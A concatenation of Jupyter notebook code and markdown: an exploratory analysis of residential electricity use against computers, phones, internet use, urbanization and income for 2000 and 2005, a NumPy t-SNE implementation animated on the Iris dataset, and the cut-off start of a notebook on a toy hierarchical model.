fileout = outputdir / 'n2_{:d}.mp4'.format(n2)
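    # Build a zero-padded, fixed-precision timestamp format for the per-frame file names
    # (e.g. "t{:04.0f}"), sized from the largest time value and the dump interval so that
    # frames sort in time order.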
tfmt = "t{:0" + "{:.0f}".format(np.ceil(np.log10(times[-1]))) + ".{:.0f}".format(max(0,-int(np.floor(np.log10(np.diff(times)[0]))))) +"f}"
nt = len(times)
vmax = 10**np.ceil(np.log10(np.max(dTs)))
filenames = []
for kt in range(nt):
t = times[kt]
fig = plt.figure(dpi=dpi)
ax = fig.gca()
title = "t = {:.1f}".format(t)
ax.set_title(title, fontsize="large")
im = ax.imshow(dTs[kt].T, cmap=cm.magma_r, origin='lower', vmin=0., vmax=vmax)
ax.tick_params(axis='both', length=4)
plt.colorbar(im, label='dT')
fname = str(tpdir / tfmt.format(t))
for ext in ['.png']:
fpath = fname + ext
fig.savefig(fpath, dpi=dpi, bbox_inches='tight', pad_inches=0)
fpath = fname + ".png"
filenames.append(fpath)
fig.clf()
plt.close('all')
# write movie
imageio.mimsave(fileout, [imageio.imread(f) for f in filenames], fps=fps)
print(f"Written file {fileout}.")
# shutil.rmtree(tpdir)
k=5
fpath = outputdir / 'n2_{:d}.mp4'.format(n2_list[k])
HTML("""
<video height="360" controls>
<source src="{:s}" type="video/mp4">
</video>
""".format(str(fpath)))
###Output
_____no_output_____ |
Electricity consumption in different regions of the world.ipynb | ###Markdown
Project: Energy consumption in the world based on level of technology and income in selected countries Table of Contents: Introduction, Data Wrangling, Exploratory Data Analysis, Conclusions Introduction> I have selected a few tables from the Gapminder project and one additional table from Data Hub that assigns countries to their continents. From Gapminder I have chosen **residential electricity use per person in kilowatt-hours as the dependent variable and various technology indicators** (personal computers per 100 people, cell phones per 100 people, internet users as % of population, urban population as % of total population), plus income per person as one non-tech indicator. After viewing the different years available in each table, I decided to **select two recent years, 2000 and 2005**.> My main question was: **How do countries with high electricity consumption differ from countries with low electricity consumption?** I will try to find the answers in two sections: 1. **Difference in regional representation** 2. **Difference in tech and income level** >Therefore, my main question can be divided into a few smaller questions: 1. How are different regions (continents) represented in the groups of high and low electricity consumption countries? - In which regions and countries can we see the highest increase in electricity consumption between 2000 and 2005? - Can we see *mobility* of regions between the low and high electricity groups between 2000 and 2005? 2. How do high electricity consumption countries differ in ownership of personal computers, phones, proportion of internet users in the population, urbanization and level of income? - Which of the tech indicators and income has the strongest correlation with electricity consumption? - Can we observe low electricity consumption countries catching up to high electricity countries in terms of tech indicators or income over time, in our case from 2000 to 2005?
###Code
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
###Output
_____no_output_____
###Markdown
Data Wrangling> All tables needed are loaded below:
###Code
comp = pd.read_csv('computers_per_100_people.csv')
phone = pd.read_csv('cell_phones_per_100_people.csv')
regions = pd.read_csv('country-and-continent-codes.csv')
internet = pd.read_csv('internet_users.csv')
urban = pd.read_csv('urban_population_percent_of_total.csv')
income = pd.read_csv('income_per_person_gdppercapita.csv')
electricity = pd.read_csv('residential_electricity_use_per_person.csv')
###Output
_____no_output_____
###Markdown
I checked all files in Excel and used VLOOKUP to make sure the country names used in the Gapminder datasets match the country names in the regions table from Data Hub. I made just a few changes to names *(for example, when one source used **Macedonia** and the other **Macedonia, FYR** as the country name, I standardized it to one version: Macedonia, FYR)*. > Below, I checked for missing values and the different date ranges of each variable. Based on this, I chose to focus only on the years 2000 and 2005, as these years were present in all datasets with relatively few missing values.
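The same renaming could also have been done in pandas rather than Excel. A minimal sketch of the idea (the `name_fixes` mapping and the tiny example frame below are hypothetical, purely for illustration):

```python
import pandas as pd

# Hypothetical mapping from one source's spelling to the other's.
name_fixes = {"Macedonia": "Macedonia, FYR"}

# Tiny illustrative frame standing in for one of the Gapminder tables.
example = pd.DataFrame({"country": ["Macedonia", "Slovak Republic"], "2000": [3.2, 4.1]})
example["country"] = example["country"].replace(name_fixes)
print(example)
```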
###Code
comp.head(4)
comp.isnull().sum()
phone.head(4)
phone.isnull().sum()
regions.head(4)
regions.isnull().sum()
internet.head(4)
internet.isnull().sum()
urban.head(4)
urban.isnull().sum()
income.head(4)
income.isnull().sum().any()
electricity.head(4)
electricity.isnull().sum()
###Output
_____no_output_____
###Markdown
Data Cleaning I wanted to merge all tables to one table where column **country** would be merging anchor for all data. Also all countries without electricity consumption data would be removed from analysis.> From Regions table all unnecessary columns were dropped:
###Code
regions.head()
regions.drop((regions.iloc[:, 2:5]), axis=1, inplace=True)
regions.head()
###Output
_____no_output_____
###Markdown
From the Gapminder tables I needed to **remove all columns except for country and the years 2000 and 2005**. In the computer, phone and internet tables, where more values were missing, I decided to fill the gaps with 2001 and 2004 values. > Unnecessary columns were dropped:
###Code
comp.drop(comp.columns.difference(['country', '2000', '2001', '2004', '2005', ]), 1, inplace=True)
phone.drop(phone.columns.difference(['country', '2000', '2001', '2004', '2005', ]), 1, inplace=True)
internet.drop(internet.columns.difference(['country', '2000', '2001', '2004', '2005', ]), 1, inplace=True)
urban.drop(urban.columns.difference(['country', '2000','2005']), 1, inplace=True)
income.drop(income.columns.difference(['country', '2000','2005']), 1, inplace=True)
electricity.drop(electricity.columns.difference(['country', '2000','2005']), 1, inplace=True)
###Output
_____no_output_____
###Markdown
> Missing values in the computer, phone and internet tables for the year 2000 were replaced by 2001 values, and missing values for 2005 were replaced by 2004 values. After that, the original 2001 and 2004 columns were removed:
###Code
comp['2000'].fillna(comp['2001'], inplace=True)
comp['2005'].fillna(comp['2004'], inplace=True)
phone['2000'].fillna(phone['2001'], inplace=True)
phone['2005'].fillna(phone['2004'], inplace=True)
internet['2000'].fillna(internet['2001'], inplace=True)
internet['2005'].fillna(internet['2004'], inplace=True)
comp.drop(['2001', '2004'], axis=1, inplace=True)
phone.drop(['2001', '2004'], axis=1, inplace=True)
internet.drop(['2001', '2004'], axis=1, inplace=True)
###Output
_____no_output_____
###Markdown
> First, I merged the *electricity* table with the *regions* table into one:
###Code
merged1 = electricity.merge(regions, left_on='country', right_on='Country', how='left')
merged1
###Output
_____no_output_____
###Markdown
> The duplicate *Country* column was removed and the *Continent_Name* column was renamed to something shorter. The *2000* and *2005* columns were also given a specific suffix so they can be identified easily in the future, larger dataset with all variables.
###Code
merged1.pop('Country')
merged1.rename(columns={'2000':'2000_el','2005':'2005_el','Continent_Name':'region'}, inplace=True)
merged1
###Output
_____no_output_____
###Markdown
In the remaining tables I also had to add suffixes to the *2000* and *2005* columns to identify the original source of the data. For that I created the function *new_name_col*. (Returning a result from the function is optional, just to check that everything is OK.)
###Code
comp.name = 'comp'
phone.name = 'phone'
internet.name = 'int'
urban.name = 'urban'
income.name = 'income'
tables = [comp, phone, internet, urban, income]
def new_name_col (tables):
for table in tables:
table.rename(columns={'2000':'2000_'+table.name, '2005':'2005_'+table.name}, inplace=True)
return tables[len(tables)-1].head()
new_name_col(tables)
###Output
_____no_output_____
###Markdown
The function *merged_table* was created to merge all remaining tables, while keeping only countries that have electricity consumption values.
###Code
def merged_table (first_table, tables):
merged = first_table
for table in tables:
merged = merged.merge(table, on='country', how='left')
return merged
merged_table (merged1, tables)
merged = merged_table (merged1, tables)
###Output
_____no_output_____
###Markdown
>Last check for missing values:
###Code
merged.info(), merged.isnull().sum()
###Output
<class 'pandas.core.frame.DataFrame'>
Int64Index: 130 entries, 0 to 129
Data columns (total 14 columns):
country 130 non-null object
2000_el 129 non-null float64
2005_el 129 non-null float64
region 130 non-null object
2000_comp 124 non-null float64
2005_comp 121 non-null float64
2000_phone 127 non-null float64
2005_phone 130 non-null float64
2000_int 129 non-null float64
2005_int 127 non-null float64
2000_urban 130 non-null float64
2005_urban 130 non-null float64
2000_income 130 non-null int64
2005_income 130 non-null int64
dtypes: float64(10), int64(2), object(2)
memory usage: 15.2+ KB
###Markdown
>Identifying missing values:
###Code
merged[merged['2000_comp'].isnull()]
merged[merged['2005_comp'].isnull()]
merged[merged['2005_el'].isnull()]
merged[merged['2000_int'].isnull()]
merged[merged['2005_int'].isnull()]
###Output
_____no_output_____
###Markdown
I decided to drop all countries with missing values. Losing 14 of the 130 countries seemed acceptable, and the countries with missing values were not concentrated in a single region.
###Code
merged.dropna(inplace=True)
merged.info()
###Output
<class 'pandas.core.frame.DataFrame'>
Int64Index: 116 entries, 0 to 129
Data columns (total 14 columns):
country 116 non-null object
2000_el 116 non-null float64
2005_el 116 non-null float64
region 116 non-null object
2000_comp 116 non-null float64
2005_comp 116 non-null float64
2000_phone 116 non-null float64
2005_phone 116 non-null float64
2000_int 116 non-null float64
2005_int 116 non-null float64
2000_urban 116 non-null float64
2005_urban 116 non-null float64
2000_income 116 non-null int64
2005_income 116 non-null int64
dtypes: float64(10), int64(2), object(2)
memory usage: 13.6+ KB
###Markdown
>After viewing the overall representation of each continent, I decided to also remove the single Oceania case, because it would be disproportionate compared to the other continents.
###Code
merged.groupby('region').describe()
merged.drop(merged.index[merged['region'] == 'Oceania'], axis=0, inplace = True)
merged.groupby('region').describe()
###Output
_____no_output_____
###Markdown
Exploratory Data Analysis To start, I wanted to know how evenly electricity consumption is distributed among the countries. From the histograms below we can tell that the distribution of electricity consumption is sharply right-skewed in both years. This means there is a small group of countries with very high electricity consumption and quite a large group with very low electricity consumption.
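As a quick numeric check of this skew, a small sketch assuming the `electricity` frame loaded above (`Series.skew()` returns the sample skewness, which is clearly positive for right-skewed data):

```python
# Sample skewness of residential electricity use per person; NaNs are skipped by default.
print(electricity['2000'].skew(), electricity['2005'].skew())
```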
###Code
electricity['2000'].hist(figsize=(7, 5))
plt.title('Distribution on electricity consumption in 2000')
plt.xlabel('electricity consumption')
plt.ylabel('frequency of countries');
electricity['2005'].hist(figsize=(7, 5))
plt.title('Distribution on electricity consumption in 2005')
plt.xlabel('electricity consumption')
plt.ylabel('frequency of countries');
###Output
_____no_output_____
###Markdown
Question: How do countries with high electricity consumption differ from countries with low electricity consumption? >First, I need to define countries with high and low electricity consumption. I will use the median value to split them into these two groups:
###Code
high_energy_2000 = merged[merged['2000_el'] >= (merged1['2000_el'].median())]
low_energy_2000 = merged[merged['2000_el'] < (merged1['2000_el'].median())]
high_energy_2005 = merged[merged['2005_el'] >= (merged1['2005_el'].median())]
low_energy_2005 = merged[merged['2005_el'] < (merged1['2005_el'].median())]
###Output
_____no_output_____
###Markdown
>Second, because the merged table contains both the 2000 and 2005 years and I don't want them to always be mixed up, I will also separate the data by year:
###Code
cols = merged.columns
c2000 = (cols[cols.str.contains('2000')])
c2005 = (cols[cols.str.contains('2005')])
c2000
###Output
_____no_output_____
###Markdown
1. Difference in regions How are different regions (continents) represented in the groups of high and low electricity consumption countries? > First, let's see how high and low energy countries are represented across the continents.
###Code
high_energy_2005.groupby('region')['2005_el'].count(), low_energy_2005.groupby('region')['2005_el'].count()
###Output
_____no_output_____
###Markdown
> We can also view percentages of high or low electricity consumption cases within each region.
###Code
round((high_energy_2005.groupby('region')['2005_el'].count()) / (merged.groupby('region')['2005_el'].count())*100, 2)
round((low_energy_2005.groupby('region')['2005_el'].count()) / (merged.groupby('region')['2005_el'].count())*100, 2)
###Output
_____no_output_____
###Markdown
>Or the regional shares within the high and low electricity consumption groups:
###Code
pct_high = round(((high_energy_2005.groupby('region')['2005_el'].count()) / (high_energy_2005.groupby('region')['2005_el'].count().sum())*100), 1)
pct_high
labels = list(pct_high.index)
sizes = list(pct_high.values)
plt.figure(figsize=(9,6))
plt.pie(sizes, labels=labels, autopct='%1.1f%%', startangle=90, pctdistance=0.8)
plt.axis('equal') # equal aspect ratio ensures that pie is drawn as a circle.
plt.title("Share of countries with high electricity consumption in regions");
plt.show()
pct_low = round(((low_energy_2005.groupby('region')['2005_el'].count()) / (low_energy_2005.groupby('region')['2005_el'].count().sum())*100), 1)
pct_low
labels = list(pct_low.index)
sizes = list(pct_low.values)
plt.figure(figsize=(9,6))
plt.pie(sizes, labels=labels, autopct='%1.1f%%', startangle=90)
plt.axis('equal') # equal aspect ratio ensures that pie is drawn as a circle.
plt.title("Share of countries with low electricity consumption in regions")
plt.show()
###Output
_____no_output_____
###Markdown
Can we see *mobility* of regions between the low and high electricity groups between 2000 and 2005? >Now, let's investigate the changes in regional distribution from 2000 to 2005.
###Code
(high_energy_2005.groupby('region')['2005_el'].count()) - (high_energy_2000.groupby('region')['2000_el'].count())
###Output
_____no_output_____
###Markdown
In which regions and countries can we see the highest increase in electricity consumption between 2000 and 2005?
###Code
electricity_change = (merged['2005_el']*100)/(merged['2000_el'])
merged.insert(4, 'el_change', electricity_change)
merged.groupby('region')['el_change'].mean().sort_values(ascending=False)
###Output
_____no_output_____
###Markdown
> Which countries experienced the highest increase in electricity consumption?
###Code
el_country_max = merged.sort_values(by=['el_change'], ascending=False)
el_country_max.iloc[0:20, 0:5]
###Output
_____no_output_____
###Markdown
> Where can we find the TOP 20 countries with the highest increase in electricity consumption?
###Code
top20_el_change = el_country_max.iloc[0:20, 0:5]
region_top_change = top20_el_change.groupby('region')['region'].count()
plt.bar([1, 2, 3, 4], region_top_change.values, tick_label=region_top_change.index)
plt.title('Highest energy consumption increase from 2000 to 2005 in countries grouped by region')
plt.xlabel('continents')
plt.ylabel('number of countries');
###Output
_____no_output_____
###Markdown
*Summary of differences by region*: Even though electricity consumption is picking up fastest in African countries, most African countries belong to the low electricity consumption group, whereas 84% of the high electricity consumption group consists of European and Asian countries. 91% of European countries, 55% of Asian countries and only 3.5% of African countries belong to the high electricity group. Between 2000 and 2005 we witnessed 3 Asian countries move from the low electricity group to the high electricity group. 2. Difference in technology and income How do high electricity consumption countries differ in ownership of personal computers, phones, proportion of internet users in the population, urbanization and level of income? > I wanted to see how high and low electricity consumption countries differ in technology indicators and income:
###Code
high_energy_2005[c2005].mean()
low_energy_2005[c2005].mean()
(high_energy_2005[c2005].mean())/(low_energy_2005[c2005].mean())
###Output
_____no_output_____
###Markdown
>We can see that in 2005, on average, high electricity countries had 8.6x higher electricity consumption, 7.7x more personal computers per 100 people, almost 3x more phones per 100 people, 5.8x more internet users in the population and 1.5x more people living in urbanised areas, while enjoying 5.4x higher income than countries with low electricity consumption.
###Code
### Can we observe low electricity consumption countries catching up to high electricity countries in terms of tech indicators or income over time, in our case from 2000 to 2005?
###Output
_____no_output_____
###Markdown
>From the numbers below we can see that this divide between high and low electricity countries was greater in 2000 when looking at phone or computer ownership and the percentage of internet users in the population, but stayed quite similar when looking at urbanization or income.
###Code
(high_energy_2000[c2000].mean())/(low_energy_2000[c2000].mean())
###Output
_____no_output_____
###Markdown
> Mean values may be distorted by extremes. Therefore I would also like to see the gap between high and low electricity countries in the tech and income indicators in graphs.
###Code
plt.figure(figsize=(10, 6))
ax1 = plt.subplot(1, 2, 1)
high_energy_2000['2000_phone'].hist(alpha = 0.5, label='high_energy')
low_energy_2000['2000_phone'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 130)
plt.legend()
plt.title('Gap in ownership of phones in high and low energy consumption countries')
plt.xlabel('number of phones per 100 people in 2000')
plt.ylabel('number of countries');
ax2 = plt.subplot(1, 2, 2, sharey=ax1)
high_energy_2005['2005_phone'].hist(alpha = 0.5, label='high_energy')
low_energy_2005['2005_phone'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 130)
plt.legend()
plt.xlabel('number of phones per 100 people in 2005');
plt.figure(figsize=(10, 6))
ax1 = plt.subplot(1, 2, 1)
high_energy_2000['2000_comp'].hist(alpha = 0.5, label='high_energy')
low_energy_2000['2000_comp'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 100)
plt.legend()
plt.title('Gap in ownership of personal computers in high and low energy consumption countries')
plt.xlabel('number of PCs per 100 people in 2000')
plt.ylabel('number of countries');
ax2 = plt.subplot(1, 2, 2, sharey=ax1)
high_energy_2005['2005_comp'].hist(alpha = 0.5, label='high_energy')
low_energy_2005['2005_comp'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 100)
plt.legend()
plt.xlabel('number of PCs per 100 people in 2005');
###Output
_____no_output_____
###Markdown
> From the 2 graphs above we can observe that the gap in ownership of phones and computers between high and low electricity countries is closing much more quickly in the case of phones.
###Code
plt.figure(figsize=(10, 6))
ax1 = plt.subplot(1, 2, 1)
high_energy_2000['2000_int'].hist(alpha = 0.5, label='high_energy')
low_energy_2000['2000_int'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 90)
plt.legend()
plt.title('Gap in percentage of internet users in population between high and low energy consumption countries')
plt.xlabel('% of internet users in population in 2000')
plt.ylabel('number of countries');
ax2 = plt.subplot(1, 2, 2, sharey=ax1)
high_energy_2005['2005_int'].hist(alpha = 0.5, label='high_energy')
low_energy_2005['2005_int'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 90)
plt.xlabel('% of internet users in population in 2005')
plt.legend();
plt.figure(figsize=(10, 6))
ax1 = plt.subplot(1, 2, 1)
high_energy_2000['2000_urban'].hist(alpha = 0.5, label='high_energy')
low_energy_2000['2000_urban'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 100)
plt.legend()
plt.title('Gap in urbanization between high and low energy consumption countries')
plt.xlabel('% of urban population in total population in 2000')
plt.ylabel('number of countries');
ax2 = plt.subplot(1, 2, 2, sharey=ax1)
high_energy_2005['2005_urban'].hist(alpha = 0.5, label='high_energy')
low_energy_2005['2005_urban'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 100)
plt.xlabel('% of urban population in total population in 2005')
plt.legend();
plt.figure(figsize=(12, 8))
ax1 = plt.subplot(1, 2, 1)
high_energy_2000['2000_income'].hist(alpha = 0.5, label='high_energy')
low_energy_2000['2000_income'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 120000)
plt.legend()
plt.title('Gap in income between high and low energy consumption countries')
plt.xlabel('average personal income in 2000 (GDP/capita, adjusted prices from 2011)', rotation=10)
plt.ylabel('number of countries');
ax2 = plt.subplot(1, 2, 2, sharey=ax1)
high_energy_2005['2005_income'].hist(alpha = 0.5, label='high_energy')
low_energy_2005['2005_income'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 120000)
plt.xlabel('average personal income in 2005 (GDP/capita, adjusted prices from 2011)', rotation=10)
plt.legend();
###Output
_____no_output_____
###Markdown
> The graphs showing the gaps in income and urbanization tell us that the divide between high and low electricity countries remained almost the same in 2005 as in 2000. Which of the tech indicators and income has the strongest correlation with electricity consumption?
###Code
cor2000 = merged[c2000].corr()
cor2000.iloc[:,:1]
cor2005 = merged[c2005].corr()
cor2005.iloc[:,:1]
###Output
_____no_output_____ |
decomposition/tsne/iris.ipynb | ###Markdown
http://www.cs.toronto.edu/~hinton/absps/tsne.pdf
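For reference, the quantities the implementation below approximates, in the notation of the linked paper (this summary is added for orientation; the factor-4 "early exaggeration" of $P$ and the adaptive per-coordinate gains used in the code are the heuristics described there). Each bandwidth $\sigma_i$ is found by binary search so that the conditional distribution
$$p_{j\mid i} = \frac{\exp\!\big(-\lVert x_i - x_j\rVert^2 / 2\sigma_i^2\big)}{\sum_{k \neq i} \exp\!\big(-\lVert x_i - x_k\rVert^2 / 2\sigma_i^2\big)}$$
has a target perplexity $2^{H(P_i)}$. The symmetrized affinities $p_{ij}$ are then matched to the Student-t similarities of the low-dimensional map points $y_i$,
$$q_{ij} = \frac{\big(1 + \lVert y_i - y_j\rVert^2\big)^{-1}}{\sum_{k \neq l} \big(1 + \lVert y_k - y_l\rVert^2\big)^{-1}},$$
by momentum gradient descent on $\mathrm{KL}(P\,\Vert\,Q)$, whose gradient is
$$\frac{\partial C}{\partial y_i} = 4 \sum_j (p_{ij} - q_{ij})\,(y_i - y_j)\,\big(1 + \lVert y_i - y_j\rVert^2\big)^{-1}.$$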
###Code
import numpy as np
from matplotlib import animation
import matplotlib.pyplot as plt
from IPython.display import HTML
from sklearn.preprocessing import LabelEncoder
import seaborn as sns
import pandas as pd
sns.set()
df = pd.read_csv('Iris.csv')
Y = df.iloc[:,-1]
df = df.iloc[:,1:-1]
df.head()
labels = np.unique(Y)
Y = LabelEncoder().fit_transform(Y)
def pca(X, dims=50):
X = X - np.tile(np.mean(X, 0), (X.shape[0], 1))
_, eigenvectors = np.linalg.eig(np.dot(X.T, X))
Y = np.dot(X, eigenvectors[:, :dims])
return Y
def pairwise_matrix(X):
sum_square_X = np.sum(np.square(X), 1)
return (-2 * np.dot(X, X.T) + sum_square_X).T + sum_square_X
def calculate_entropy_and_P(X, variance):
P = np.exp(-X * variance)
sum_P = np.sum(P)
P = P / sum_P
H = -np.sum(np.log(P) * P)
return H, P
def calculate_nearest_perplexity(X, toleration=1e-5, perplexity=30,tried=50):
ori_pairwise = pairwise_matrix(X)
empty_pairwise = np.zeros((X.shape[0], X.shape[0]))
sigmas = np.ones((X.shape[0]))
log_P = np.log(perplexity)
for i in range(X.shape[0]):
if (i+1) % 100 == 0:
print("Computing P-values for point %d of %d" % (i+1, X.shape[0]))
sigma_min = -np.inf
sigma_max = np.inf
pairwise_i = ori_pairwise[i, np.setxor1d(np.arange(X.shape[0]),[i])]
H, P_pairwise_i = calculate_entropy_and_P(pairwise_i, sigmas[i])
H_diff = H - log_P
tries = 0
while np.abs(H_diff) > toleration and tries < tried:
if H_diff > 0:
sigma_min = sigmas[i]
if sigma_max == np.inf or sigma_max == -np.inf:
sigmas[i] *= 2
else:
sigmas[i] = (sigmas[i] + sigma_max) / 2
else:
sigma_max = sigmas[i]
if sigma_min == np.inf or sigma_min == -np.inf:
sigmas[i] /= 2
else:
sigmas[i] = (sigmas[i] + sigma_min) / 2
H, P_pairwise_i = calculate_entropy_and_P(pairwise_i, sigmas[i])
H_diff = H - log_P
tries += 1
empty_pairwise[i, np.setxor1d(np.arange(X.shape[0]),[i])] = P_pairwise_i
return empty_pairwise
def TSNE(X, dimensions=2, pca_dimensions=50, perplexity=30, min_learning_rate=0.001,
iterations=500, initial_momentum=0.5, final_momentum=0.9):
X = pca(X, dims=pca_dimensions)
Y = np.random.randn(X.shape[0], dimensions)
dY = np.zeros((X.shape[0], dimensions))
velocity_Y = np.zeros((X.shape[0], dimensions))
learning_rate = np.zeros((X.shape[0], dimensions))
pairwise = calculate_nearest_perplexity(X, toleration=1e-5, perplexity=perplexity)
pairwise = 4 * (pairwise + pairwise.T) / np.sum(pairwise)
ratio = 500
for i in range(iterations):
sum_Y = np.sum(np.square(Y), 1)
num = -2. * np.dot(Y, Y.T)
num = 1. / (1. + np.add(np.add(num, sum_Y).T, sum_Y))
num[range(X.shape[0]), range(X.shape[0])] = 0
Q = num / np.sum(num)
PQ = pairwise - Q
for n in range(X.shape[0]):
dY[n, :] = np.sum(np.tile(PQ[:, n] * num[:, n], (dimensions, 1)).T * (Y[n, :] - Y), 0)
initial_momentum += (initial_momentum / iterations)
momentum = min(initial_momentum, final_momentum)
learning_rate = (learning_rate + 0.2) * ((dY > 0.) != (velocity_Y > 0.)) + (learning_rate * 0.8) * ((dY > 0.) == (velocity_Y > 0.))
learning_rate[learning_rate < min_learning_rate] = min_learning_rate
velocity_Y = momentum * velocity_Y - ratio * (learning_rate * dY)
Y = Y + velocity_Y
Y = Y - np.tile(np.mean(Y, 0), (X.shape[0], 1))
if i == 100:
pairwise = pairwise / 4
return Y
tsne = TSNE(df.values)
plt.figure(figsize=(10,5))
for no, i in enumerate(np.unique(Y)):
plt.scatter(tsne[Y==i,0], tsne[Y==i,1], label=labels[no])
plt.legend()
plt.show()
tsne_3d = TSNE(df.values, dimensions=3)
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure(figsize=(10,8))
ax = fig.add_subplot(111, projection='3d')
for no, i in enumerate(np.unique(Y)):
ax.scatter(tsne_3d[Y==i,0], tsne_3d[Y==i,1], tsne_3d[Y==i,2], label=labels[no])
plt.legend()
plt.show()
dimensions = 2
ratio = 500
min_learning_rate = 0.001
initial_momentum = 0.5
final_momentum = 0.9
iterations = 300
fig = plt.figure(figsize=(13,8))
ax = plt.axes()
tsne = np.random.randn(df.shape[0], dimensions)
dY = np.zeros((df.shape[0], dimensions))
velocity_Y = np.zeros((df.shape[0], dimensions))
learning_rate = np.zeros((df.shape[0], dimensions))
pairwise = calculate_nearest_perplexity(df.values, toleration=1e-5, perplexity=30)
pairwise = 4 * (pairwise + pairwise.T) / np.sum(pairwise)
scatters = []
min_y, max_y, min_x, max_x = np.min(tsne[:,1])-1, np.max(tsne[:,1])+1,np.min(tsne[:,0])-1, np.max(tsne[:,0])+1
for no, i in enumerate(np.unique(Y)):
scatters.append(ax.scatter(tsne[Y==i,0], tsne[Y==i,1], label=labels[no]))
ax.legend()
ax.set_xlabel('epoch: %d'%(0))
ax.axis([min_x, max_x, min_y, max_y])
def train_TSNE(epoch):
global dY, tsne, velocity_Y, pairwise, initial_momentum, learning_rate
sum_Y = np.sum(np.square(tsne), 1)
num = -2. * np.dot(tsne, tsne.T)
num = 1. / (1. + np.add(np.add(num, sum_Y).T, sum_Y))
num[range(df.shape[0]), range(df.shape[0])] = 0
Q = num / np.sum(num)
PQ = pairwise - Q
for n in range(df.shape[0]):
dY[n, :] = np.sum(np.tile(PQ[:, n] * num[:, n], (dimensions, 1)).T * (tsne[n, :] - tsne), 0)
initial_momentum += (initial_momentum / iterations)
momentum = min(initial_momentum, final_momentum)
learning_rate = (learning_rate + 0.2) * ((dY > 0.) != (velocity_Y > 0.)) + (learning_rate * 0.8) * ((dY > 0.) == (velocity_Y > 0.))
learning_rate[learning_rate < min_learning_rate] = min_learning_rate
velocity_Y = momentum * velocity_Y - ratio * (learning_rate * dY)
tsne = tsne + velocity_Y
tsne = tsne - np.tile(np.mean(tsne, 0), (df.shape[0], 1))
if epoch == 100:
pairwise = pairwise / 4
min_y, max_y, min_x, max_x = np.min(tsne[:,1])-1, np.max(tsne[:,1])+1,np.min(tsne[:,0])-1, np.max(tsne[:,0])+1
for no, i in enumerate(np.unique(Y)):
scatters[no].set_offsets([tsne[Y==i,0], tsne[Y==i,1]])
ax.set_xlabel('epoch: %d'%(epoch))
ax.axis([min_x, max_x, min_y, max_y])
return scatters, ax
anim = animation.FuncAnimation(fig, train_TSNE, frames=iterations, interval=200)
anim.save('animation-tsne-iris.gif', writer='imagemagick', fps=10)
dimensions=2
pca_dimensions=50
min_learning_rate=0.001
iterations=500
fig = plt.figure(figsize=(13,8))
ax = plt.axes()
tsne = np.random.randn(df.shape[0], dimensions)
scatters = []
min_y, max_y, min_x, max_x = np.min(tsne[:,1])-1, np.max(tsne[:,1])+1,np.min(tsne[:,0])-1, np.max(tsne[:,0])+1
for no, i in enumerate(np.unique(Y)):
scatters.append(ax.scatter(tsne[Y==i,0], tsne[Y==i,1], label=labels[no]))
ax.legend()
ax.set_xlabel('perplexity: %d'%(0))
ax.axis([min_x, max_x, min_y, max_y])
def train_TSNE_perplexity(epoch):
initial_momentum=0.5
final_momentum=0.9
X = pca(df, dims=pca_dimensions)
tsne = np.random.randn(X.shape[0], dimensions)
dY = np.zeros((X.shape[0], dimensions))
velocity_Y = np.zeros((X.shape[0], dimensions))
learning_rate = np.zeros((X.shape[0], dimensions))
pairwise = calculate_nearest_perplexity(X, toleration=1e-5, perplexity=epoch)
pairwise = 4 * (pairwise + pairwise.T) / np.sum(pairwise)
ratio = 500
for i in range(iterations):
sum_Y = np.sum(np.square(tsne), 1)
num = -2. * np.dot(tsne, tsne.T)
num = 1. / (1. + np.add(np.add(num, sum_Y).T, sum_Y))
num[range(X.shape[0]), range(X.shape[0])] = 0
Q = num / np.sum(num)
PQ = pairwise - Q
for n in range(X.shape[0]):
dY[n, :] = np.sum(np.tile(PQ[:, n] * num[:, n], (dimensions, 1)).T * (tsne[n, :] - tsne), 0)
initial_momentum += (initial_momentum / iterations)
momentum = min(initial_momentum, final_momentum)
learning_rate = (learning_rate + 0.2) * ((dY > 0.) != (velocity_Y > 0.)) + (learning_rate * 0.8) * ((dY > 0.) == (velocity_Y > 0.))
learning_rate[learning_rate < min_learning_rate] = min_learning_rate
velocity_Y = momentum * velocity_Y - ratio * (learning_rate * dY)
tsne = tsne + velocity_Y
tsne = tsne - np.tile(np.mean(tsne, 0), (X.shape[0], 1))
if i == 100:
pairwise = pairwise / 4
min_y, max_y, min_x, max_x = np.min(tsne[:,1])-1, np.max(tsne[:,1])+1,np.min(tsne[:,0])-1, np.max(tsne[:,0])+1
for no, i in enumerate(np.unique(Y)):
scatters[no].set_offsets([tsne[Y==i,0], tsne[Y==i,1]])
ax.set_xlabel('perplexity: %d'%(epoch))
ax.axis([min_x, max_x, min_y, max_y])
return scatters, ax
anim = animation.FuncAnimation(fig, train_TSNE_perplexity, frames=100, interval=200)
anim.save('animation-tsne-perplexity-iris.gif', writer='imagemagick', fps=10)
###Output
/usr/local/lib/python3.5/dist-packages/ipykernel_launcher.py:5: RuntimeWarning: divide by zero encountered in log
"""
/usr/local/lib/python3.5/dist-packages/ipykernel_launcher.py:5: RuntimeWarning: invalid value encountered in multiply
"""
|
toy_hierarchical_model.ipynb | ###Markdown
**Description:** This notebook demonstrates the application of PGA, PQN, PMGA, and EM to the toy hierarchical model in Example 1 of [Scalable particle-based alternatives to EM](https://juankuntz.github.io/publication/parem/) and reproduces Figures 1 and 2 therein. Figure 1 To start, we load the modules we need and implement the algorithms. The algorithms take the following inputs:* y : D-dimensional vector of observations,* h : step-size,* K : number of steps,* N : number of particles,* th : 1-dimensional vector containing the initial parameter guess,* X : D x N matrix containing the initial particle cloud;and return a single output:* th : K-dimensional vector of parameter estimates.
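For reference, the gradient and EM expressions implemented below correspond to the Gaussian hierarchical model $y_d \mid x_d \sim \mathcal{N}(x_d, 1)$, $x_d \sim \mathcal{N}(\theta, 1)$, independently for $d = 1, \dots, D$ (this is read off from the code; see Example 1 of the paper for the precise statement):
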